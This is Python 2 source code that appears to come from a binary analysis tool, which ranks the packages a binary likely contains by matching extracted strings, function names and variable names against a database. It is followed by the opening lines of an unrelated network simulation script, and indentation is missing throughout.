ignorefields = set(['value', 'name', 'type', 'data', 'options', 'parent', 'description', 'instance', 'port', 'out', 'properties', 'project', 'next', 'id', 'listeners', 'status', 'target', 'result', 'index', 'buffer', 'values', 'count', 'size', 'key', 'path', 'cache', 'map', 'file', 'context', 'initialized', 'verbose', 'version', 'debug', 'message', 'attributes', 'url', 'DEBUG', 'NAME', 'state', 'source', 'password', 'text', 'start', 'factory', 'entries', 'buf', 'args', 'logger', 'config', 'length', 'encoding', 'method', 'resources', 'timeout', 'filename', 'offset', 'server', 'mode', 'in', 'connection'])
## Keep a list of which sha256s were already seen. Since the files are
## likely only coming from a few packages there is no need to hit the database
## that often.
sha256cache = {}
if 'BAT_FIELDNAME_SCAN' in scanenv:
query = "select package from fieldcache_java where fieldname=%s"
for f in fields:
## a few fields are so common that they will be completely useless
## for reporting, but processing them will take a *lot* of time, so
## just skip them. This list is based on research of many many Java
## source code files.
if f in ignorefields:
continue
pvs = []
funccursor.execute(query, (f,))
fieldres = funccursor.fetchall()
funcconn.commit()
if fieldres != []:
fieldres_tmp = []
for r in fieldres:
if r[0] in clones:
field_tmp = clones[r[0]]
fieldres_tmp.append(field_tmp)
else:
fieldres_tmp.append(r[0])
fieldres_tmp = set(fieldres_tmp)
fieldres = map(lambda x: (x, 0), fieldres_tmp)
fieldspvs[f] = fieldres
variablepvs['fields'] = fieldspvs
variablepvs['sources'] = sourcepvs
variablepvs['classes'] = classpvs
## these are the unique function names only, just add some stubs here
for i in uniquepackages:
versions = []
dynamicRes['packages'][i] = []
return (dynamicRes, variablepvs)
def scankernelsymbols(variables, scanenv, kernelquery, funccursor, funcconn, clones):
allvvs = {}
uniquevvs = {}
variablepvs = {}
for v in variables:
pvs = []
funccursor.execute(kernelquery, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
variablepvs['type'] = 'linuxkernel'
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return variablepvs
## From dynamically linked ELF files it is possible to extract the dynamic
## symbol table. This table lists the functions and variables which are needed
## from external libraries, but also lists local functions and variables.
## By searching a database that contains which function names and variable names
## can be found in which packages it is possible to identify which package was
## used.
def scanDynamic(scanstr, variables, scanenv, funccursor, funcconn, clones):
dynamicRes = {}
variablepvs = {}
if not ('BAT_FUNCTION_SCAN' in scanenv or 'BAT_VARNAME_SCAN' in scanenv):
return (dynamicRes, variablepvs)
if 'BAT_FUNCTION_SCAN' in scanenv:
uniquepackages = {}
namesmatched = 0
uniquematches = 0
## caching datastructure, only needed in case there is no full cache
sha256_packages = {}
## the database made from ctags output only has function names, not the types. Since
## C++ functions could be in an executable several times with different types we
## deduplicate first
query = "select package from functionnamecache_c where functionname=%s"
for funcname in scanstr:
funccursor.execute(query, (funcname,))
res = funccursor.fetchall()
funcconn.commit()
pkgs = []
if res != []:
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
namesmatched += 1
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]] += [funcname]
else:
uniquepackages[packages_tmp[0]] = [funcname]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['totalnames'] = len(scanstr)
## unique matches found.
dynamicRes['uniquematches'] = uniquematches
if uniquematches != 0:
dynamicRes['packages'] = {}
dynamicRes['versionresults'] = {}
## these are the unique function names only
## TODO: here versions for function names were computed. This needs clean ups.
for package in uniquepackages:
versions = []
dynamicRes['versionresults'][package] = []
dynamicRes['packages'][package] = []
for v in set(versions):
dynamicRes['packages'][package].append((v, versions.count(v)))
## Scan C variables extracted from dynamically linked files.
if scanenv.get('BAT_VARNAME_SCAN'):
ignorevariables = set(['options', 'debug', 'options', 'verbose', 'optarg', 'optopt', 'optfind', 'optind', 'opterr'])
## keep two mappings:
## 1. unique variable names per package
## 2. package per variable name
uniquevvs = {}
allvvs = {}
query = "select distinct package from varnamecache_c where varname=%s"
for v in variables:
## These variable names are very generic and would not be useful, so skip.
## This is based on research of millions of C files.
if v in ignorevariables:
continue
pvs = []
funccursor.execute(query, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return (dynamicRes, variablepvs)
## match identifiers with data in the database
## First match string literals, then function names and variable names for various languages
def lookup_identifier(scanqueue, reportqueue, cursor, conn, scanenv, topleveldir, avgscores, clones, scandebug, unmatchedignorecache, lock):
## first some things that are shared between all scans
if 'BAT_STRING_CUTOFF' in scanenv:
try:
stringcutoff = int(scanenv['BAT_STRING_CUTOFF'])
except:
stringcutoff = 5
else:
stringcutoff = 5
## TODO: this should be done per language
if 'BAT_SCORE_CACHE' in scanenv:
precomputescore = True
else:
precomputescore = False
usesourceorder = False
if 'USE_SOURCE_ORDER' in scanenv:
usesourceorder = True
## don't use precomputed scores when using source order
precomputescore = False
## default parameters for scoring
alpha = 5.0
scorecutoff = 1.0e-20
gaincutoff = 1
kernelquery = "select package FROM linuxkernelfunctionnamecache WHERE functionname=%s LIMIT 1"
precomputequery = "select score from scores where stringidentifier=%s LIMIT 1"
while True:
## get a new task from the queue
(filehash, filename) = scanqueue.get(timeout=2592000)
## read the pickle with the data
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
if leafreports['identifier'] == {}:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
## grab the lines extracted earlier
lines = leafreports['identifier']['strings']
language = leafreports['identifier']['language']
## this should of course not happen, but hey...
scanlines = True
if not language in scanenv['supported_languages']:
scanlines = False
if lines == None:
lenlines = 0
scanlines = False
else:
lenlines = len(lines)
linuxkernel = False
scankernelfunctions = False
if 'linuxkernel' in leafreports['tags']:
linuxkernel = True
if scanenv.get('BAT_KERNELFUNCTION_SCAN') == 1 and language == 'C':
scankernelfunctions = True
## first compute the score for the lines
if lenlines != 0 and scanlines:
## keep a dict of versions, license and copyright statements per package. TODO: remove these.
packageversions = {}
packagelicenses = {}
packagecopyrights = {}
if have_counter:
linecount = collections.Counter(lines)
else:
linecount = {}
for l in lines:
if l in linecount:
linecount[l] += 1
else:
linecount[l] = 1
## first look up and assign strings for as far as possible.
## strings that have not been assigned will be assigned later based
## on their score.
## Look up strings in the database and assign strings to packages.
uniqueMatches = {}
nonUniqueScore = {}
stringsLeft = {}
sameFileScore = {}
nonUniqueMatches = {}
nonUniqueMatchLines = []
nonUniqueAssignments = {}
directAssignedString = {}
unmatched = []
ignored = []
#unmatchedignorecache = set()
kernelfuncres = []
kernelparamres = []
if scandebug:
print >>sys.stderr, "total extracted strings for %s: %d" % (filename, lenlines)
## some counters for keeping track of how many matches there are
matchedlines = 0
unmatchedlines = 0
matchednotclonelines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
nrUniqueMatches = 0
## start values for some state variables that are used
## most of these are only used if 'usesourceorder' == False
matched = False
matchednonassigned = False
matchednotclones = False
kernelfunctionmatched = False
uniquematch = False
oldline = None
notclones = []
if usesourceorder:
## keep track of which package was the most uniquely matched package
uniquepackage_tmp = None
uniquefilenames_tmp = []
## keep a backlog for strings that could possibly be assigned later
backlog = []
notclonesbacklog = []
else:
## sort the lines first, so it is easy to skip duplicates
lines.sort()
stringquery = "select package, filename FROM %s WHERE stringidentifier=" % stringsdbperlanguagetable[language] + "%s"
print(stringquery)
for line in lines:
#if scandebug:
# print >>sys.stderr, u"processing <|%s|>" % line
kernelfunctionmatched = False
if not usesourceorder:
## speedup if the line happens to be the same as the old one
## This does *not* alter the score in any way, but perhaps
## it should: having a very significant string a few times
## is a strong indication.
if line == oldline:
if matched:
matchedlines += 1
if uniquematch:
nrUniqueMatches += 1
#uniqueMatches[package].append((line, []))
elif matchednonassigned:
linecount[line] = linecount[line] - 1
matchednonassignedlines += 1
elif matchednotclones:
linecount[line] = linecount[line] - 1
matchednotclonelines += 1
else:
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
uniquematch = False
matched = False
matchednonassigned = False
matchednotclones = False
oldline = line
## skip empty lines (only triggered if stringcutoff == 0)
if line == "":
continue
lock.acquire()
if line in unmatchedignorecache:
lock.release()
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
lock.release()
if len(line) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
## An extra check for lines that score extremely low. This
## helps reduce load on databases stored on slower disks. Only used if
## precomputescore is set and "source order" is False.
if precomputescore:
cursor.execute(precomputequery, (line,))
scoreres = cursor.fetchone()
conn.commit()
if scoreres != None:
## If the score is so low it will not have any influence on the final
## score, why even bother hitting the disk?
## Since there might be package rewrites this should be a bit less than the
## cut off value that was defined.
if scoreres[0] < scorecutoff/100:
nonUniqueMatchLines.append(line)
matchednonassignedlines += 1
matchednonassigned = True
linecount[line] = linecount[line] - 1
continue
## if scoreres is None the line could still be something else like a kernel function, or a
## kernel string in a different format, so keep searching.
## If the image is a Linux kernel image first try Linux kernel specific matching
## like function names, then continue as normal.
if linuxkernel:
## This is where things get a bit ugly. The strings in a Linux
## kernel image could also be function names, not string constants.
## There could be false positives here...
if scankernelfunctions:
cursor.execute(kernelquery, (line,))
kernelres = cursor.fetchall()
conn.commit()
if len(kernelres) != 0:
kernelfuncres.append(line)
kernelfunctionmatched = True
linecount[line] = linecount[line] - 1
continue
## then see if there is anything in the cache at all
try:
cursor.execute(stringquery, (line,))
except:
conn.commit()
## something weird is going on here, probably
## with encodings, so just ignore the line for
## now.
## One example is com.addi_40_src/src/com/addi/toolbox/crypto/aes.java
## from F-Droid. At line 221 there is a string SS.
## This string poses a problem.
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
res = cursor.fetchall()
conn.commit()
if len(res) == 0 and linuxkernel:
## make a copy of the original line
origline = line
## try a few variants that could occur in the Linux kernel
## The values of KERN_ERR and friends have changed in the years.
## In 2.6 it used to be for example <3> (defined in include/linux/kernel.h
## or include/linux/printk.h )
## In later kernels this was changed.
matchres = reerrorlevel.match(line)
if matchres != None:
scanline = line.split('>', 1)[1]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
line = scanline
else:
scanline = scanline.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
else:
## In include/linux/kern_levels.h since kernel 3.6 a different format is
## used. TODO: actually check in the binary whether or not a match (if any)
## is preceded by 0x01
matchres = rematch.match(line)
if matchres != None:
scanline = line[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
if len(res) == 0:
scanline = line.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
## result is still empty, perhaps it is a module parameter. TODO
if len(res) == 0:
if '.' in line:
if line.count('.') == 1:
paramres = reparam.match(line)
if paramres != None:
pass
## if 'line' has been changed, then linecount should be changed accordingly
if line != origline:
linecount[origline] = linecount[origline] - 1
if line in linecount:
linecount[line] = linecount[line] + 1
else:
linecount[line] = 1
## nothing in the cache
if len(res) == 0:
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
if len(res) != 0:
## Assume:
## * database has no duplicates
## * filenames in the database have been processed using os.path.basename()
if scandebug:
print >>sys.stderr, "\n%d matches found for <(|%s|)> in %s" % (len(res), line, filename)
pkgs = {} ## {package name: set([filenames without path])}
filenames = {}
## For each string determine in how many packages (without version) the string
## is found.
## If the string is only found in one package the string is unique to the package
## so record it as such and add its length to a score.
for result in res:
(package, sourcefilename) = result
if package in clones:
package = clones[package]
if not package in pkgs:
pkgs[package] = set([sourcefilename])
else:
pkgs[package].add(sourcefilename)
if not sourcefilename in filenames:
filenames[sourcefilename] = [package]
else:
filenames[sourcefilename] = list(set(filenames[sourcefilename] + [package]))
scalar = 1
if len(pkgs) != 1:
nonUniqueMatchLines.append(line)
## The string found is not unique to a package, but is it
## unique to a filename?
## This method assumes that files that are named the same
## also contain the same or similar content. This could lead
## to incorrect results.
## now determine the score for the string
try:
score = (1 * scalar) / pow(alpha, (len(filenames) - 1))
print(filenames, len(filenames))
print("======================================================")
except Exception, e:
## pow(alpha, (len(filenames) - 1)) is overflowing here
## so the score would be very close to 0. The largest value
## is sys.maxint, so use that one. The score will be
## smaller than almost any value of scorecutoff...
if usesourceorder:
score = (1 * scalar) / sys.maxint
else:
matchednonassigned = True
matchednonassignedlines += 1
linecount[line] = linecount[line] - 1
continue
## if it is assumed that the compiler puts string constants in the
## same order in the generated code then strings can be assigned
## to the package directly
if usesourceorder:
if uniquepackage_tmp in pkgs:
assign_string = False
assign_filename = None
for pf in uniquefilenames_tmp:
if pf in pkgs[uniquepackage_tmp]:
assign_string = True
assign_filename = pf
break
if assign_string:
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [line]
else:
nonUniqueMatches[uniquepackage_tmp].append(line)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((line, assign_filename, score))
else:
directAssignedString[uniquepackage_tmp] = [(line, assign_filename, score)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
matchedlines += 1
linecount[line] = linecount[line] - 1
continue
else:
## store pkgs and line for backward lookups
backlog.append((line, pkgs[uniquepackage_tmp], score))
if not score > scorecutoff:
matchednonassigned = True
matchednonassignedlines += 1
if not usesourceorder:
linecount[line] = linecount[line] - 1
continue
## After having computed a score determine if the files
## the string was found in in are all called the same.
## filenames {name of file: { name of package: 1} }
if filter(lambda x: len(filenames[x]) != 1, filenames.keys()) == []:
matchednotclonelines += 1
for fn in filenames:
## The filename fn containing the matched string can only
## be found in one package.
## For example: string 'foobar' is present in 'foo.c' in package 'foo'
## and 'bar.c' in package 'bar', but not in 'foo.c' in package 'bar'
## or 'bar.c' in foo (if any).
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey,0) + score
matchednotclones = True
if not usesourceorder:
linecount[line] = linecount[line] - 1
notclones.append((line, filenames))
else:
notclonesbacklog.append((line, filenames))
continue
else:
for fn in filenames:
## There are multiple packages in which the same
## filename contains this string, for example 'foo.c'
## in packages 'foo' and 'bar. This is likely to be
## internal cloning in the repo. This string is
## assigned to a single package in the loop below.
## Some strings will not signficantly contribute to the score, so they
## could be ignored and not added to the list.
## For now exclude them, but in the future they could be included for
## completeness.
stringsLeft['%s\t%s' % (line, fn)] = {'string': line, 'score': score, 'filename': fn, 'pkgs' : filenames[fn]}
## lookup
else:
## the string is unique to this package and this package only
uniquematch = True
## store the uniqueMatches without any information about checksums
if not package in uniqueMatches:
uniqueMatches[package] = [(line, [])]
else:
uniqueMatches[package].append((line, []))
linecount[line] = linecount[line] - 1
if usesourceorder:
uniquepackage_tmp = package
uniquefilenames_tmp = pkgs[package]
## process backlog
for b in xrange(len(backlog), 0, -1):
assign_string = False
assign_filename = None
(backlogline, backlogfilenames, backlogscore) = backlog[b-1]
for pf in uniquefilenames_tmp:
if pf in backlogfilenames:
assign_string = True
assign_filename = pf
break
if assign_string:
## keep track of the old score in case it is changed/recomputed here
oldbacklogscore = backlogscore
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [backlogline]
else:
nonUniqueMatches[uniquepackage_tmp].append(backlogline)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((backlogline, assign_filename, backlogscore))
else:
directAssignedString[uniquepackage_tmp] = [(backlogline, assign_filename, backlogscore)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
## remove the directly assigned string from stringsLeft,
## at least for *this* package
try:
for pf in backlogfilenames:
del stringsLeft['%s\t%s' % (backlogline, pf)]
except KeyError, e:
pass
## decrease matchednonassigned if the originally computed score
## is too low
if not oldbacklogscore > scorecutoff:
matchednonassigned = matchednonassigned - 1
linecount[backlogline] = linecount[backlogline] - 1
for cl in notclonesbacklog:
(notclone, filenames) = cl
if notclone == backlogline:
matchednotclonelines -= 1
for fn in filenames:
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey) - backlogscore
notclonesbacklog.remove(cl)
break
else:
break
## store notclones for later use
notclones += notclonesbacklog
backlog = []
notclonesbacklog = []
matched = True
## for statistics it's nice to see how many lines were matched
matchedlines += 1
## clean up stringsLeft first
for l in stringsLeft.keys():
if linecount[stringsLeft[l]['string']] == 0:
del stringsLeft[l]
## done looking up and assigning all the strings
uniqueScore = {}
for package in uniqueMatches:
if not package in uniqueScore:
uniqueScore[package] = 0
for line in uniqueMatches[package]:
uniqueScore[package] += (1 * scalar)
directAssignedScore = {}
for package in directAssignedString:
if not package in directAssignedScore:
directAssignedScore[package] = 0
for line in directAssignedString[package]:
directAssignedScore[package] += line[2]
## If the string is not unique, do a little bit more work to determine which
## file is the most likely, so also record the filename.
##
## 1. determine whether the string is unique to a package
## 2. if not, determine which filenames the string is in
## 3. for each filename, determine whether or not this file (containing the string)
## is unique to a package
## 4. if not, try to determine the most likely package the string was found in
## For each string that occurs in the same filename in multiple
## packages (e.g., "debugXML.c", a cloned file of libxml2 in several
## packages), assign it to one package. We do this by picking the
## package that would gain the highest score increment across all
## strings that are left. This is repeated until no strings are left.
pkgsScorePerString = {}
for stri in stringsLeft:
pkgsSortedTmp = map(lambda x: {'package': x, 'uniquescore': uniqueScore.get(x, 0)}, stringsLeft[stri]['pkgs'])
## get the unique score per package and sort in reverse order
pkgsSorted = sorted(pkgsSortedTmp, key=lambda x: x['uniquescore'], reverse=True)
## and get rid of the unique scores again. Now it's sorted.
pkgsSorted = map(lambda x: x['package'], pkgsSorted)
pkgs2 = []
for pkgSort in pkgsSorted:
if uniqueScore.get(pkgSort, 0) == uniqueScore.get(pkgsSorted[0], 0):
pkgs2.append(pkgSort)
pkgsScorePerString[stri] = pkgs2
newgain = {}
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
newgain[p2] = newgain.get(p2, 0) + stringsLeft[stri]['score']
useless_packages = set()
for p in newgain.keys():
## check if packages could ever contribute usefully.
if newgain[p] < gaincutoff:
useless_packages.add(p)
## walk through the data again, filter out useless stuff
new_stringsleft = {}
string_split = {}
for stri in stringsLeft:
## filter out the strings that only occur in packages that will contribute
## to the score. Ignore the rest.
if filter(lambda x: x not in useless_packages, pkgsScorePerString[stri]) != []:
new_stringsleft[stri] = stringsLeft[stri]
strsplit = stri.rsplit('\t', 1)[0]
if strsplit in string_split:
string_split[strsplit].add(stri)
else:
string_split[strsplit] = set([stri])
## the difference between stringsLeft and new_stringsleft is matched
## but unassigned if the strings *only* occur in stringsLeft
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
for i in oldstrleft.difference(set(string_split.keys())):
matchednonassignedlines += linecount[i]
matchedlines -= linecount[i]
stringsLeft = new_stringsleft
roundNr = 0
strleft = len(stringsLeft)
## keep track of which strings were already found. This is because each string
## is only considered once anyway.
while strleft > 0:
roundNr = roundNr + 1
#if scandebug:
# print >>sys.stderr, "\nround %d: %d strings left" % (roundNr, strleft)
gain = {}
stringsPerPkg = {}
## cleanup
if roundNr != 0:
todelete = set()
for stri in stringsLeft:
if linecount[stringsLeft[stri]['string']] == 0:
todelete.add(stri)
for a in todelete:
del stringsLeft[a]
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
## Determine to which packages the remaining strings belong.
newstrleft = set()
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
if p2 in useless_packages:
continue
gain[p2] = gain.get(p2, 0) + stringsLeft[stri]['score']
if not p2 in stringsPerPkg:
stringsPerPkg[p2] = []
stringsPerPkg[p2].append(stri)
newstrleft.add(stringsLeft[stri]['string'])
for i in oldstrleft.difference(newstrleft):
if linecount[i] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[i] -= 1
for p2 in gain.keys():
## check if packages could ever contribute usefully.
if gain[p2] < gaincutoff:
useless_packages.add(p2)
## gain_sorted contains the sort order, gain contains the actual data
gain_sorted = sorted(gain, key = lambda x: gain.__getitem__(x), reverse=True)
if gain_sorted == []:
break
## so far value is the best, but that might change
best = gain_sorted[0]
## Possible optimisation: skip the last step if the gain is not high enough
if filter(lambda x: x[1] > gaincutoff, gain.items()) == []:
break
## if multiple packages have a big enough gain, add them to 'close'
## and 'fight' to see which package is the most likely hit.
close = filter(lambda x: gain[x] > (gain[best] * 0.9), gain_sorted)
## Let's hope "sort" terminates on a comparison function that
## may not actually be a proper ordering.
if len(close) > 1:
#if scandebug:
# print >>sys.stderr, " doing battle royale between", close
## reverse sort close, then best = close_sorted[0][0]
for c in close:
if avgscores[language].get(c) is None:
avgscores[language][c] = 0
close_sorted = map(lambda x: (x, avgscores[language][x]), close)
close_sorted = sorted(close_sorted, key = lambda x: x[1], reverse=True)
## If we don't have a unique score *at all* it is likely that everything
## is cloned. There could be a few reasons:
## 1. there are duplicates in the database due to renaming
## 2. package A is completely contained in package B (bundling).
## If there are no hits for package B, it is more likely we are
## actually seeing package A.
if uniqueScore == {}:
best = close_sorted[-1][0]
else:
best = close_sorted[0][0]
#if scandebug:
# print >>sys.stderr, " %s won" % best
best_score = 0
## for each string in the package with the best gain add the score
## to the package and move on to the next package.
todelete = set()
for xy in stringsPerPkg[best]:
x = stringsLeft[xy]
strsplit = xy.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
## is this correct here? There are situations where one
## string appears multiple times in a single source file
## and also the binary (eapol_sm.c in hostapd 0.3.9 contains
## the string "%s state=%s" several times and binaries
## do too.
todelete.add(strsplit)
continue
sameFileScore[best] = sameFileScore.get(best, 0) + x['score']
best_score += 1
linecount[strsplit] = linecount[strsplit] - 1
if best in nonUniqueMatches:
nonUniqueMatches[best].append(strsplit)
else:
nonUniqueMatches[best] = [strsplit]
for a in todelete:
for st in string_split[a]:
del stringsLeft[st]
## store how many non unique strings were assigned per package
nonUniqueAssignments[best] = nonUniqueAssignments.get(best,0) + best_score
if gain[best] < gaincutoff:
break
strleft = len(stringsLeft)
for i in stringsLeft:
strsplit = i.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[strsplit] -= 1
scores = {}
for k in set(uniqueScore.keys() + sameFileScore.keys()):
scores[k] = uniqueScore.get(k, 0) + sameFileScore.get(k, 0) + nonUniqueScore.get(k,0) + directAssignedScore.get(k,0)
scores_sorted = sorted(scores, key = lambda x: scores.__getitem__(x), reverse=True)
rank = 1
reports = []
if scores == {}:
totalscore = 0.0
else:
totalscore = float(reduce(lambda x, y: x + y, scores.values()))
for s in scores_sorted:
try:
percentage = (scores[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatches.get(s,[]), 'uniquematcheslen': len(uniqueMatches.get(s,[])), 'percentage': percentage, 'packageversions': packageversions.get(s, {}), 'packagelicenses': packagelicenses.get(s, []), 'packagecopyrights': packagecopyrights.get(s,[])})
rank = rank+1
if matchedlines == 0 and unmatched == []:
res = None
else:
if scankernelfunctions:
matchedlines = matchedlines - len(kernelfuncres)
lenlines = lenlines - len(kernelfuncres)
ignored = list(set(ignored))
ignored.sort()
res = {'matchedlines': matchedlines, 'extractedlines': lenlines, 'reports': reports, 'nonUniqueMatches': nonUniqueMatches, 'nonUniqueAssignments': nonUniqueAssignments, 'unmatched': unmatched, 'scores': scores, 'unmatchedlines': unmatchedlines, 'matchednonassignedlines': matchednonassignedlines, 'matchednotclonelines': matchednotclonelines, 'matcheddirectassignedlines': matcheddirectassignedlines, 'ignored': list(set(ignored))}
else:
res = None
## then look up results for function names, variable names, and so on.
if language == 'C':
if linuxkernel:
functionRes = {}
if 'BAT_KERNELSYMBOL_SCAN' in scanenv:
namekernelquery = "select distinct package from linuxkernelnamecache where varname=%s"
variablepvs = scankernelsymbols(leafreports['identifier']['kernelsymbols'], scanenv, namekernelquery, cursor, conn, clones)
## TODO: clean up
if leafreports['identifier'].has_key('kernelfunctions'):
if leafreports['identifier']['kernelfunctions'] != []:
functionRes['kernelfunctions'] = copy.deepcopy(leafreports['identifier']['kernelfunctions'])
else:
(functionRes, variablepvs) = scanDynamic(leafreports['identifier']['functionnames'], leafreports['identifier']['variablenames'], scanenv, cursor, conn, clones)
elif language == 'Java':
if not ('BAT_CLASSNAME_SCAN' in scanenv or 'BAT_FIELDNAME_SCAN' in scanenv or 'BAT_METHOD_SCAN' in scanenv):
variablepvs = {}
functionRes = {}
else:
(functionRes, variablepvs) = extractJava(leafreports['identifier'], scanenv, cursor, conn, clones)
else:
variablepvs = {}
functionRes = {}
## then write results back to disk. This needs to be done because results for
## Java might need to be aggregated first.
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'].append('ranking')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
reportqueue.put(filehash)
scanqueue.task_done()
def licensesetup(scanenv, cursor, conn, debug=False):
if cursor == None:
return (False, {})
cursor.execute("select table_name from information_schema.tables where table_type='BASE TABLE' and table_schema='public'")
tablenames = map(lambda x: x[0], cursor.fetchall())
conn.commit()
## Now verify the names of the tables
newenv = copy.deepcopy(scanenv)
supported_languages = set()
## for Java
if 'stringscache_java' in tablenames:
supported_languages.add('Java')
else:
if 'Java' in supported_languages:
a.remove('Java')
if 'Java' in supported_languages:
if 'classcache_java' in tablenames:
newenv['BAT_CLASSNAME_SCAN'] = 1
else:
if 'BAT_CLASSNAME_SCAN' in newenv:
del newenv['BAT_CLASSNAME_SCAN']
if 'fieldcache_java' in tablenames:
newenv['BAT_FIELDNAME_SCAN'] = 1
else:
if 'BAT_FIELDNAME_SCAN' in newenv:
del newenv['BAT_FIELDNAME_SCAN']
if 'functionnamecache_java' in tablenames:
newenv['BAT_METHOD_SCAN'] = 1
else:
if 'BAT_METHOD_SCAN' in newenv:
del newenv['BAT_METHOD_SCAN']
## for C
if 'stringscache_c' in tablenames:
supported_languages.add('C')
else:
if 'C' in supported_languages:
a.remove('C')
if 'C' in supported_languages:
if 'varnamecache_c' in tablenames:
newenv['BAT_VARNAME_SCAN'] = 1
if 'functionnamecache_c' in tablenames:
newenv['BAT_FUNCTION_SCAN'] = 1
## for Linux kernel
if 'linuxkernelnamecache' in tablenames:
newenv['BAT_KERNELSYMBOL_SCAN'] = 1
if 'linuxkernelfunctionnamecache' in tablenames:
newenv['BAT_KERNELFUNCTION_SCAN'] = 1
if 'renames' in tablenames:
newenv['HAVE_CLONE_DB'] = 1
supported_languages = list(supported_languages)
newenv['supported_languages'] = supported_languages
return (True, newenv)
|
simulation_1.py
|
import network_1
import link_1
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_1.Host(1)
object_L.append(client)
server = network_1.Host(2)
object_L.append(server)
router_a = network_1.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link_1.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link_1.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_1.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
